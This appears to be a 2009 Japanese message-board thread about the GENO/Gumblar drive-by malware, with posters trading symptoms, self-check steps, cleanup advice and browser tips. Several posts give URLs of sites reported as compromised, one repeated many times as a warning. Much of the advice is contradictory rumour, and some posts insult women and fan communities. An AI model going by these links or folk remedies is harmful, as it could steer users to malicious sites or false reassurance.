　　 　 　 　 　 |;:;:_:;:_:;:_:;:_;:;_:;:l:;_;:_:;:_:;:_:;:_;:_;|
　　　　　　　　|＿＿＿＿＿_|＿＿＿＿＿|
　　　　　　　　|　三|　　＿ 　 　 ＿　　 |三 !
　　　　　　　　|　三|　 三ｼ　　　ヾ三　 |三 |
　　　　　　　　|　三′　 .._　|||||　 _,,..u i三 | 　　
　　　　　　　　ト､ﾆ|　<でiﾝヽ　 ;'i"ｨでiﾝ |三.|
　　　　　　　　', iヽ!　 ､　‐' /　 !､　ーシ |ｼ,ｲ　　
　　　　　　　　 i,ヽﾘ　u　　,' :　 !.　u　　 |ｆ ﾉ　　　　
　　　　　　　　　ヾ!　　　ui ,､　,..､ヽ__!＿lノ
　　　　　　　　　　|　　　　　 _　_　 ﾞｰ┬､｀ヽ､
　　　　　　　 　 　 l　　　 ,ｨﾁ‐-‐fー'⌒,ﾗｰ- ヽ
　　　　　　 　 　 　 ﾞi､　　 ゝ､二ﾌ,ﾆ二j　,-ヽ　＼　　　＿__
　　　　　 　 　 　 　 | ＼　　ｰ一 ﾞｰ'７/ ハ　　､　 ＼_/ -ヽ
　　　　　　　　　　,ィ|､　 ＼　　　　 /,二=-ヽ_　ﾞ、　ヽ^i-!:i
　　　　　　 ＿, イ　 | ヽ＿ 二＝''"　`ｰ--､　 ｀　ﾞ、　丿 !:|

Operaでやっといたほうがいい設定教えて

この手のまとめサイトは無駄に冗長になっててわかりにくいよな。
>>151でいいと思うよ。

まとめサイト作る人はまとめるのが下手な法則
仕方ない

http://www.seibidoshuppan.co.jp　　　　　　　http://www.seibidoshuppan.co.jp
　　　　　　　http://www.seibidoshuppan.co.jp　　　　　　http://www.seibidoshuppan.co.jp
　　http://www.seibidoshuppan.co.jp　　http://www.seibidoshuppan.co.jp　
　http://www.seibidoshuppan.co.jp　　　　　　　　http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jp
　　　　http://www.seibidoshuppan.co.jp　　　　　　http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp　　　http://www.seibidoshuppan.co.jp
　　　　　　　http://www.seibidoshuppan.co.jp　　　　　　　　　http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp　　　　http://www.seibidoshuppan.co.jp
　　http://www.seibidoshuppan.co.jp　　　　　　　　　　　　　http://www.seibidoshuppan.co.jp
　　　　　　　　　　http://www.seibidoshuppan.co.jp　　http://www.seibidoshuppan.co.jp
　http://www.seibidoshuppan.co.jp　　踏むな！！　　http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp　　　　　　　http://www.seibidoshuppan.co.jp
　　　　　　　http://www.seibidoshuppan.co.jp　　　　　　http://www.seibidoshuppan.co.jp
　　http://www.seibidoshuppan.co.jp　　http://www.seibidoshuppan.co.jp　
　http://www.seibidoshuppan.co.jp　　　　　　　　http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jphttp://www.seibidoshuppan.co.jp
　　　　http://www.seibidoshuppan.co.jp　　　　　　　　　http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp　　　http://www.seibidoshuppan.co.jp
　　　　　　　http://www.seibidoshuppan.co.jp　　　　　　　　　http://www.seibidoshuppan.co.jp
http://www.seibidoshuppan.co.jp　　　　http://www.seibidoshuppan.co.jp
　　http://www.seibidoshuppan.co.jp　　　　　　　　　　　　　http://www.seibidoshuppan.co.jp
　　　　　　　　　　http://www.seibidoshuppan.co.jp　　http://www.seibidoshuppan.co.jp

まとめwiki重すぎﾜﾛﾀ
同人の方は軽すぎﾜﾛﾀ

ニコニコ感染マダァ〜

いつも思うんだけど
ネットつなげていて、毎日アップデートしないやつって何なの？

xpsp3　IE8の実験用Pen4機で踏んでこようかな

標的がOfficeじゃなくてアクロバットってのがニクいよね

666 名前：以下、名無しにかわりましてVIPがお送りします[] 投稿日：2009/05/17(日) 20:08:32.73 ID:9hjXkHlgO
ニコニコ動画見ていた→パソコン電源落ちる→再起動でブルスク


マジで助けて

もう発生してない国に逃げるしかない。

>>159
それではお願いします。
あと、なにかリクエストが欲しいのならば
ttp://www3.atword.jp/gnome
の記事を参考にするとか
同人板の人たちにきくのが吉。

>>172
俺みたいなめんどくさがりの低スペック使い
スタートアップとか、プロセスが少しでも多いと気になって仕方がない

いい加減PC買い換えたい・・・

このウィルスの報告で電源勝手に落ちるなんてあったか？

>>179
無いと思う

>>178
3ﾏｿくらいで買えるだろOSはDSP版でいいじゃねえか。

ならハードが逝きかけてるだけじゃね

多分過負荷で落ちたんだろ

>>175
ニコニコも感染してんの？

avast!は効果ありますか？

オミトロンってJavascriptはチェックできるの？

>>169
一つだけ当たりのzipある

プリフェッチの切り方 Firefox
http://www.google.co.jp/intl/ja/help/features.html#prefetch
Google Chrome
http://www.google.com/support/chrome/bin/answer.py?hl=jp&answer=96788

>>188
先読み切っても何の意味もねーよアホ

>>162
一応それっぽいウィルスが出回ってるのは事実みたいだな
ソースはマカフィ

使ってよかったfoxitReader

>>181
すでに友人に金借りてる状況であらたに物買う気にならん。
今月分で完済予定だがな

ていうかたぶん高スペックになってもこの貧乏性は直んないと思う。
大学のときにオンボロメーカー製PC使ってたときに付いた癖だから

>>185
avastしか効果ありません

同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
→http://www.seibidoshuppan.co.jp/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状　>>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1の
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/

まさかν速民にいまごろXPとかの情弱はいないよな
Vistaならノーガード余裕
ttp://ranobe.com/up/src/up360292.png

ぶっちゃけもう飽きてきた

FTPってなんだ？

どうしたらいいのか分からん

avast広めるのはいいけど
一応シャットダウンの不具合も書いておいた方がいいんじゃ？
後ライセンスキーの事も

FoxitもScriptオフにしとけよ

どうやるのさ

まとめが重すぎて同人まとめしか見れないんだけど、内容は同じ？

同人まとめ
ttp://www31.atwiki.jp/doujin_vinfo/

>>191
Foxitでも設定でjava切っとけよ

シャットダウンの不具合についてKWSK

>>197 ファイル転送

>>184
接続関係だし、落ちることはあまりないかなあ。
過負荷かあったかくなってきたからPCの掃除不足かな。

>>188
現状ではChromeより、Ironのほうがよくね？

>>173
よろしくお願いします。

あれ？結局ニフとか言ってたのはガセだったの？

>>200
そだね、切っておくよ。

なんか頭痛と鼻水が出てきた。
悪寒がするし、おなかも今朝から下痢っぽいし。
なんだろな…orz

成美堂出版は、トップページじゃなく、トップページからscript src=で呼び出してるjsファイルに
ウイルス埋め込まれてるのか

ついにPC→ヒト間に変異したか・・・

>>210
お前もおしまいか

flashplayerとpdfreaderも自動アップデートさせてればこんなことにならんかった
明らかに市場独占してるadobeの怠慢

>>210
どう考えても豚GENOウィルス

>>208
ニフはガセ、らしい


とりあえず各種アップデートやっといたから大丈夫だおる。たぶん
プロセスチェックだけはかかさずやっとこう

>>212
やべーw
外でなくても死ぬ

早くニコニコに感染させろ

空のゼロックスフォルダがあるんだが…
しかも削除できない…

>>219
お　わ　っ　た　な

感染したらどうなんの

ゼロックスではなくてxeroxってかけよそこは

ゼロックスって聞くとMtG思い出す。

どうすりゃいいのよ
ＰＣ知識ゼロの俺にはわからん

>>224
放置をオススメする

>>219
空なら大丈夫じゃね？

UACって何かプログラム起動するとでてくるけどウイルスと何の関係があるんだ？
成美堂出版にアクセスしたらいきなりでてくるのか？

>>224
それそのままでおｋ

今回はタスクマネージャーのプロセスで「これがあったらアウト」ってのはないんだな

>>221
GENO感染時の症状

sqlsodbc.chmを改変
cmd.exe、regedit.exeが起動不能
一部のアンチウイルスソフトが更新不能
特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
Googleの検索結果を改竄(リンクを弄る)
explorer.exeや一部のブラウザが異常終了
Acrobatが勝手に起動
PDFファイルやシステムファイルが増殖
CPU、メモリ使用率がUP
再起動時にBSOD

らしい

>>142
ｔｔｐ：//ｗｗｗ.senlights.co.jp/seihin/kirenaru-1s.htm
昨日このサイトで感染させたんだけど
avastでJS:Redirector-H7 [Trj]が検出された
これがGENOウイルスかは不明

cmd.exeとregedit.exeは起動したしsqlsodbc.chmの書き換えもなし
http://www.dotup.org/uploda/www.dotup.org37897.jpg

各セキュリティーベンダーの対応状況は？

>>210
それは恋だな

>>221
>>210

>>233
どんだけ想ってんだよｗ

まあいいか
ノートンが対応するまで待とうっと

>>134
感染したと思われるw2kでコマンドプロンプトは起動したな。regeditも

ノートンまだ対応してねーのかよ
夕方頃「ノートン対応ｋｔｋｒ」とか書き込んでる奴いたのに

これってファイルをどうこうするウイルスじゃないみたいだから
最悪感染した後でも別システムで起動すればバックアップは取れるよね

ニフティがプロバイダごと感染して会員全滅ってスレ立ってるけどマジ？

>>236
300 192.168.0.774 [sage] 2009/05/17(日) 17:49:24 ID:6zykGUMd0
　martuz.cnノートンが対応
　ttps://safeweb.norton.com/report/show?name=martuz.cn

>>227
ウィルスコード実行するとPDFなんかがクラッシュしたあと、マルウェアがシステムドライブにアクセスしようとする。
UACオンにしてるとそこで止まる。

そもそもVistaだとウィルスコード実行されないけどね。

>>240
ガセ

ZEROがきっちりと弾きました！
ってなるといいなあ

>>233
その理屈は変だろ

>>244
きちんとTempフォルダにダウンロードしてから検査するから大丈夫

AVGって弾きますか？

>>232
Avast! が検知するだけ。
対策はクリーンインストールのみ。

flashplayerってどうやってアップデートするんだろ
むしろflashplayerが入ってるのかどうかすらわからないんだが…

つーかマジAdobeに突撃した方がいいと思うんだが

このウィルスで騒いでるのってニュー速だけ？

>>249
プログラムの追加と削除

>>243
良かった、流石にそりゃねーよ会員に訴えられるぞって思ったわ

ノートン2009のLiveアップデートすると、デバイスマネージャーで表示されるネットワークアダプタの末尾に
Symantec Network Security Miniportっていうのが！マーク付きで表示されて
ネットができなくなるんだけど。
調べたら対応策なしとか書いてあってオワタ。
アップデートできないとか俺死ぬの？GENOウイルス感染待ちなの？

>>249
IE用
http://fpdownload.adobe.com/get/flashplayer/current/install_flash_player_ax.exe
Fx等用
http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe

>>249
ようつべとか見ないの？

>>251
そもそも一般ユーザーは気付いていない
知らないで再起動＞ブルスク

気付いた者が生き残れる

>>252
ありがとう
なんかAdobeFlashPlayer10ActiveXってのがはいｔってこわすぎ

adobereader入れてないから安心だ

昔、FLASHの関連付けを切って元に戻せなくなったｗ
アホだなぁ、俺

http://takeshima.2ch.net/test/read.cgi/news4vip/1242547793/l50
vipperは相変わらずアホぞろいだな

>>199
> 一応シャットダウンの不具合も書いておいた方がいいんじゃ？
> 後ライセンスキーの事も

ｋｗｓｋ

>>258
それがIE版

>>257
サイトにアクセスするだけだからウィルスって事にすら気づかないだろうしな
正に情弱涙目

糞だ。
重い重い。
そう言われても信じてNoScript入れてた俺の大勝利

>>248
消せないの？

なんだノートンも対応してるし、ゼロックスフォルダも心配いらないみたいね

Flashの最新は10.0.22.87

sqlsodbc.chmの更新日が一年前だしcmd、regedit共に起動するから
感染してないはずだけど怖くて再起動できない
誰か俺を安心させてν速のみんな

>>265
何も苦労せずにスクリプトだけじゃなくてflashも自由自在に切り替えられるOpera民は大大大大

月曜日からが地獄だな。
出社してきたサイト管理者が迂闊にGENOウイルスサイト踏んで感染したら、大変なことになる。
きっとニュースで迂闊な月曜日とか言われて、大騒ぎになるぜ。

ttp://zerohaziblog.blog4.fc2.com/blog-date-20090514.html
普通にこういうのがいるから

>>258
つか、アド(　ﾟдﾟ)､ﾍﾟｯぐらいお気に入りに入れとけ。

よくわからん
俺感染してないしなんかウソくせー

確かにadobeにも責任はあるかもな。

>>258は前スレ見てなくてよかったな

>>265
つい最近はマルウェア的な動作があって叩きに叩かれたもんだがな

>>270
Flashもjsで動かしてるのにアホだなおまえ

>>274
こういうウィルスは君みたいな真偽確かめれない情弱から感染していくんだぜ

>>274
壮大な釣りだから気にしなくていいよ

同人ってキモオタのサイトだろ？ｗどうでもいいわ

>>269とりあえず最悪の事考えて残したいで゛ー他は退避させてから再起動

>>59
不吉なこと言うんじゃねえ！

これ感染してたら再起動かけた時に発動すんの？
まとめ見られないんだが

アクロバット入れてなけりゃＯＫなんじゃないの？

で、チミたちVista買うの？
７が出るまでインターネット辞めるの？

未だに感染していないオイラは運が良かっただけなのか？
とりあえず、まとめのウィルス確認して全部セーフだった
ニコニコとか動画サイトいくつか見ちゃったけど、これからは用心だな

ふたばとにちゃんしか開かない俺に死角はなかった

>>269
新しいPCとOSを買えばいい。
これで解決。

「pdfはブラクラ」ってのはほんとのことだったのだなあ

>>285
対策してXPで7待ち

同人板マジおもしれえ

ノートン先生対応きた？

今更Vistaなんて買うわけがねえ

キモヲタのネット内での行動力は異常

>>285
ケーブルTVとADSLの2回線で2系統の環境構築しているから
問題ないね。流出しても平気ｗ
7まで待つよ。

>>254
【ﾉｰﾄﾝ】Norton Internet Security Ver.165【2009】
http://pc11.2ch.net/test/read.cgi/sec/1242559778/

母艦でやらずにクリーンインストールした骨董サブノートでしばらく生きるわ

2chが感染したら2chブラウザでもあうあう？

幸いにもウイルス無かったが、しばらくエロサイトめぐりは自粛だなあ・・・・

有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認

とりあえず最新版にしてりゃ感染サイト見ても大丈夫なんだろ？
馬鹿馬鹿しいからもうネットサーフィン再開するわ
貴重な休日潰れたわ

>>237
2000はGENOウイルスに感染しないのでは？
違うのですか?

>>300
なにそれこわい

Avast Professionalユーザの俺様大勝利だな

>>301
XPなんか使ってるから丸1日無駄にする
時間は貴重だろ？

carwash踏んでから再起動したけどなんもなかった

とりあえず家計簿にしかつかってなかったvistaノートを使うことにするか…。

バスターさん、IE8対応してないってマジかよ
家族のPCのブラウザIE8にしちゃったよ…
自分は火狐だけど
どうしようかね

正直インフルエンザのウィルスより怖いわ(神戸在住)

会社のPCでしばらくネットサーフィン禁止にしたほうがいいかな
昼休憩とかも

vista厨ウゼーよ
無駄に煽んなボケ

>>303
ＺＩＰを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。

心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。

涙目すなぁ＾＾

事故解決

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・FTPに接続するとパスワードを収集され新たな攻撃の踏み台にされる
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

PC上級者の俺でも分からないのが
「ウイルスが進化した」っていうけど、
これは伝染していく間に勝手に「進化」するのではなくて
誰かが故意に「進化」させたっていうことで桶？

おｋでしたｗｗｗ

【感染の確認方法】

�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

てかっ、
電源オフや再起動したらアカンのかよＯｒｚ

今日は徹夜かよ

VISTAだけど邪魔だからUACなんて切ってたぞ糞が

一ヶ月くらい起動してないサブＰＣを更新のために起動するべきか脅威が去るまで放置するべきかうーん

>>266
今のところ消す方法は無い。
hostsをいじって収集サイトへのアクセスを遮断する方法はあるけど、収集サイトがいつ変わるかわからんから気休め。

気をつけていても安全そうな所でもウイルスに感染している可能性があって、
しかも検出不可なので感染したのにも分からず、
感染したのが気がついたら時既に遅しでもはや再インストールしか道が無いとは。
はんぱねーな。

>>315
そうね
変異はウィルス自身の機能として持たせることも出来るが

>>318
今から入れればいいじゃない。
あと厨ソフトでUAC時の画面暗転切るのも御法度な。

>>315
うん

胃が痛くなってきた

vistaから７に無償で移行できるってスレ見てちょっとvista入れようかとも思ったけど、
あれって既存のユーザーが対象になるのか分からないんだよね？

sqlsodbc.chmの容量がメインも仮想ＰＣも半年くらいネットつなげてないのも50,727バイトじゃないんだけどどうなってるんだ
>>300のチェッカーでは大丈夫だって出てるけど

>>315
糞ﾜﾛﾀ

とりあえず寝るわ
寝たら治るだろ

>>326
多分プリンストールモデルはスルーかも。
でも割安でメーカーがアップグレードプログラム用意してくれるかもね。
メーカー次第だけど。

>>327
OS晒せ

>>300の感染確認batファイルをデスクトップにでも置いておけば
いつでも簡単に確認できるから落としておくことを強く勧めます。

キンタマウイルスとは方向性が違うが、潜伏っぷりと対処法が嫌過ぎる
誰だよ作った奴

>>264
へたにサイトを運営していたり、自宅に仕事を持って変えたっりしていて
FTPでファイル更新をして、そしてそのサイトもウイルス配布サイトに。

これは暫く止まりそうもないな。

>>331
ＸＰ　ホームエディション

知らない奴だけが問題なんだろ
ここで騒いでてやるだけやった奴はもう安心だろ

>>335
ご冥福お祈りします

今Ｖｉｓｔａのパソコン買っても２年ぐらいでもうサポート期間終わっちゃうんだろ？
ひどすぎ
買えねーじゃん

同人板糞ﾜﾛﾀ

881 ＧＥＮＯ[sage] 2009/05/17(日) 21:25:49 ID:oUobyklU0 [New]
火狐が扱いにくそうだと感じたらOperaでもおｋ
IEコンポーネントだっけ？をつかってるからサイト見るときもIEで見るのと変わらないらしいよ
あとこのスレ的にはOperaのほうがお勧めみたい

>>333
つーか、これでキンタマみたいな症状だったらって考えただけでも恐ろしいよな

この際プニル厨は火狐にしとけ

> 631 名前：名無しさん＠お腹いっぱい。 sage New! ▽1件 投稿日：2009/05/16
(土) 23:47:24 0回目
> >>501>>514>>518
> Sleipnir → Firefox3 移行推進計画
> ttp://ktrue.blog.shinobi.jp/Entry/387/
>
> ここに書かれてるの片っ端から入れたら楽に乗り換えられた
> 今じゃアドオン探しに夢中だわ

そしたら次はこれな

> Firefoxのリンク先読み機能"network.prefetch-next"を無効にする方法
> ttp://d.hatena.ne.jp/EijiYoshida/20070919/1190194409

最後はpdf踏んだら処理方法を聞いてくるようにする拡張

> PDF Download 2.2.0.0
> ttps://addons.mozilla.org/en-US/firefox/addon/636

アドベをアンインストールしたら感染サイトに突っ込んでも平気なんだろ？

>>335
うわぁ・・・・

http://tsushima.2ch.net/test/read.cgi/news/1242534578/

このスレの動画超見たいんだけど
youtubeは感染してないよね？ね？
java入れちゃってもいいよね？ね？

この際ﾌﾟﾆﾙ厨と火狐ねとらん厨はOperaにしとけ

>>344
いいから早く寝ろ

>>344
youtubeのリンク
危険度7%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告

ＩＥ８だとどこ行っても感染しないっぽいな
IE7以下でもjscript.dllを差し替えるだけでも回避できそうに思えるがどうなんだろう

>>309
逆じゃね？（笑）
弱毒性のインフルエンザウイルスより、
ある意味GENOのが怖いだろ（笑）

JaneDeoStyleでこのスレ見てる奴
感染してるぞ

>>334
仕事のデータFTPでやりとりするアホは死ぬべき

症状的には、キモオタにとっちゃキンタマの方が嫌じゃないか？
性癖等のハイド氏を不特定多数に公開されるわけだから。
GENOは晒し系じゃないだけマシ。

あと似非キンタマなんかは感知されない場合が多いから、
潜伏っぷりに関しても嫌らしいと思う。

>>277
あ?

flashだけ無効にできるの
そんでjavascriptは本来全くコンピューターに損害与えようがない拡張だから、安心してjavascript付きのWeb巡回ができる

flashを防ぎたいがために便利なjavascriptを犠牲にしなくてはならない火狐はカス、ﾌﾟﾆﾙは論外

∴Opera最強定理は示された

>>330
しばらく様子見ます
サンクス

うぃきは大丈夫なの？
ｖｉｓｔａでのチェック方法は？

現時点だとVISTAが鉄壁の防御力を誇っているな。
※UACをONにしている場合に限る

VistaだけどAdobeのFLASHとReaderをダウンロードしかしてないんだが他に特になにもしなくてよさげ？
PCの知識皆無だからよくわからん、再起動は普通に出来たから感染はしてないと思うが･･･

>>351
そんなサーバの使い方をしている企業が、まだまだ沢山ある。
SFTPって何？とか言って、サーバは未だにRH７とか。

2002年から一切更新されてないSmabaも動いてるWEBサーバとか
IP認証をかけずにTELNET許可してるサーバなんてのも、数え切れないよ。

>>344
大丈夫だよ
俺そこ見てたし

sqlsodbcの容量が46ｋｂしかなくてチェックツールに怒られたけど、
そもそも英語版ヘルプだから問題じゃないだろうな。

>>356
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認

ＺＩＰを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。

チェック後の起動画面。
http://www.rupan.net/uploader/download/1242563513.png

>>353
flash無効化ってどうやるん？　“アニメーションを有効にする”のチェックを外せばいいの？

この煽り方だと大丈夫みたいだな

ウイルス？なにそれ？怖い！って腐女子が大騒ぎしてるだけだろ
実際感染しても最悪ブルーバックくらいだし
対策も容易。そこまで騒ぐ意味が分からん

>>359
RH7の頃でさえ標準でtelnet無効かつSSH動いてなかったかｗ
まあ、90年代の運用やってるところは滅びればいいよ

3,4日前までいっぱいあったXP厨の
「VistaでもこのVirusには安全じゃない、XP最高ぅうううう」な論調が全くなくなったのが笑える

しばらく2ch以外のネットはPS3で見るかｗ

今回の件に限らず不具合とか検出率の面ではバスターとノートンどっちがおすすめ？

もっててよかったPS3

>>362
ありがとう
感染してたらどうなるんですか？
感染してたら右側の規定がでてこなかったりしますか？

ちなみにｖｉｓｔａでＵＡＣは外してないみたいです

>>353
火狐でもAdblockで*.swfと指定すりゃflash弾くことできるんだが

にフ騒ぎと良いヌ即も同人とどっこいじゃねえ？w
ここ見てると同レベル

Flash無効にすれば大丈夫なの？
一応火狐にFlashblockっていうアドオンあるからこれ入れたら無効化できるけど

>>365
情報抜かれるのが困るんだよ
クレカの番号とかネットバンキングのパスワードとか

K's電気でPCを購入しました。
HDDが壊れた時用＋別PC用にOSのCDをくれと何度も言ったのですが
HDDに入っているからそれをコピーすれば良いと言われ突き放されました。
OSの抽出の方法がわからず、今回、HDDを新規購入のデスクトップ（OSなし）に移そうと考え、色々検索してみたのですが
HDDをイメージ化するソフトとHDDをUSB接続するハードとケーブルを別途購入しなければならないのでしょうか？

>>376
どこのコピペだよ

>>376
IDの出ないセキュ板で遊んで来い

>>371
こんなメッセージがでます。

GENOウィルスに感染している恐れがあります。
直ちにこの端末をスタンドアロンにして、
必要なファイルをバックアップ、ウィルスの駆除またはOSのリカバリを推奨します。

俺が初期に感染したときは再起動しても問題なかったぞ
cmdが勝手に動いてたから異常なのはすぐわかったけど

>>380
ウイルスは進化するから。

>>311
XP厨くやしいのうｗくやしいのうｗ

何でこんなに盛り下がってんだよ

>>379
ありがとうございます。
無事だったんで一安心

>>383
他所で釣りでもしてるんじゃね？

>>383
引きこもりになったから

>>375
今までのウイルスもそんなもんだろ
適当に同人サイト見てみたら今回のウイルスについて間違った知識てんこ盛りで
えらそうに対策打ってた奴もいてワロタ
女はネットやるな

エロ収集はP2Pでするか

>>383
ウイルス作者が低スキルみたいだからなあ。
くだらんわ。

>>338
完成されたOSということだよ

>>358
基本的にはおｋ

Adobe Acrobat ReaderとAdobe Flash Playerを
最新にしたらある程度のリスクは回避でＯＫなのか？

しゃあないとりあえずＰＣはパンドラとコソアンだけにしとくか

このサイトは大丈夫でしょうか？
http://www.takamagahara.com/printin/

うかつにオナニーも出来ないね

今回のウイルスはAdobeの脆弱性を狙ったものだから
Flash PlayerとReaderを公開された修正版にアップデートすれば話は終わるんだが
それすらわからない人達がいっぱいいるから盛り上がっているわけです

flash最新版にしてるのに
youtube他サイトでflash最新版を求められる
なぜ？！

>>394
すごく懐かしいと思っただけ

>>396
せいかいれす(^q^)

>>363
コンテンツ > プラグインを有効にする のチェックをはずす

私はいくつか日本の友達を探したくて、日本語を学んで、私もあ
なた達の中国語を教えることができて、みんなが私と友達をすることができることを望んで、私は今中学生です
付き合う中国のBlogger：monkey.d.lin.blog.163.com
QQ：395458789日
本のBlogger： http://blog.livedoor.jp/lyz395458789【Blogge
rが今日ちょうどいじったのです、その上私が日本語が見て分かりません、だから少し単調です】

なんかもっと未曾有の恐怖が蔓延すると思ったけど、
そんな感じじゃないな。

>394
GENOウイルスチェッカー
危険度2%
安全なURLです。踏んでも大丈夫でしょう。

>>396
へーなるへそー
まぁ警戒に越した事は無いが心の荷が軽くなったぜ

そしたらそれ以外の弱点を突いて来るウイルスが
出て来るかもなんですね…（そうなったらもはや新種だが

vista厨って
ロクな知識もない低知能がノコノコとPC買いに行って店員の言いなりになってムザムザとvistaインスコモデルを買わされたんでしょ？
良かったね、溜飲を下げることができて。おめでとう。君たちの選択は正しかったと思うよ。うん。ｗｗｗｗｗｗｗｗｗ

>>397
キャッシュじゃねえの？

>>401
なぜにアラビア

もっとこう、社会がめちゃめちゃになるようなウイルス作れんのかね
頭悪いんだな

>>397
インスコ直後なら再起動しなさい

>>396
ああそれとありがとう
さて周りの人間に対策方法などを伝えたりするか…

>>383
同人板が今旬

GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう！
絶対に踏んではいけません。
評価ミス報告

>>397
最新バージョンは10,0,22,87
↓確認してみ
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

同人板は腐女子が未曾有の恐怖に叩き込まれているな。

同人板普段行かないけどあのスレは結構親切だな

フラッシュプレイヤーは10 0 22 87
アドビも最新版にした
noscriptもadblockも入れた
UACも有効
これで大丈夫な筈だよね

改竄されたページのスクショとかってないの？
ＧＥＮＯとかどんなんなってたのか見てみたい

この手の騒ぎがくるといろいろ調べるから知識が増えてちょっと嬉しい。

あるサイト危険度５０％で安全って言われたけど、大丈夫なのか？ｗ

http://changi.2ch.net/test/read.cgi/doujin/1242565127/10-13


うんこ漏らした

>>416
そこまで対策したからと言って[大丈夫]の一言で片付けるのは危ないよ

>>418
　　　　　　　　／⌒ヽ　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　 ∧,,∧＾ω＾）　＜　このスレ定期的に立つNE！
　　　　　 /・ ・`ヽと )　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　(｡｡ノ　　しヽ
　　　　　 /ヽ　/　　ﾉ
　　　　　（　へ　/|.|
　　　　　　ヽヽ| | U
　　　　　　　　| |　ﾊﾟｶﾊﾟｶ
　　　　　　　　Ｕ

レジもコマンドも開けた
とりあえず安心

さっきseibidoshuppan踏んじまったけどなぜか大丈夫だった

感染したらどうなんの？

>>425
かゆうま

>>425
注目の的になる

>>415
つかν速民は他の板に行かないほうがいい。
メシウマとか情弱とか語って煽ってるマジキチ＝ν速民ってのが他の板では常識なんだよｗ

firefoxにしててよかった

>>425
GOODLUCK!!BABY!!

>>423
最近の亜種は、レジもコマンドも開けられるようだよ。

>>425
再インスコの理由が出来る

>>425
おちんちんにブツブツが出来る

プニルだったから大丈夫だったのかな
再起動したけど問題なし>>362これも問題なし

OS、antivirとflash更新してきた
readerは元から使ってないsumatraでおｋ
これで当分様子見

>>431
レジストリエディタが開けるんだったら、直すのもそんなに難しくないわけだがｗ

>>425
乗るしかないこのビッグウェーブに。

Adobe Reader の最新版って9.1.1なんだろ？
ふつうにサイト行っただけじゃ9.1しかないじゃん
わかりにくすぎだろ

>>438
helpのupdateの有無みたいなとっからできるよ

>>365
個人サイト持ちが多い腐女子にとっては驚異的なウイルスであると容易に想像できる。

XPSP2なんだがSP3にしたほうがいいのか教えろクズども

>>436
そういわれても、確かめようがなくて困っているのですよ。

926 名前：GENO[] 投稿日：2009/05/17(日) 21:50:07 ID:1XXBwaecO (携帯)
最近の亜種だとcmdもregeditも普通に出来るみたいってのはマジ？

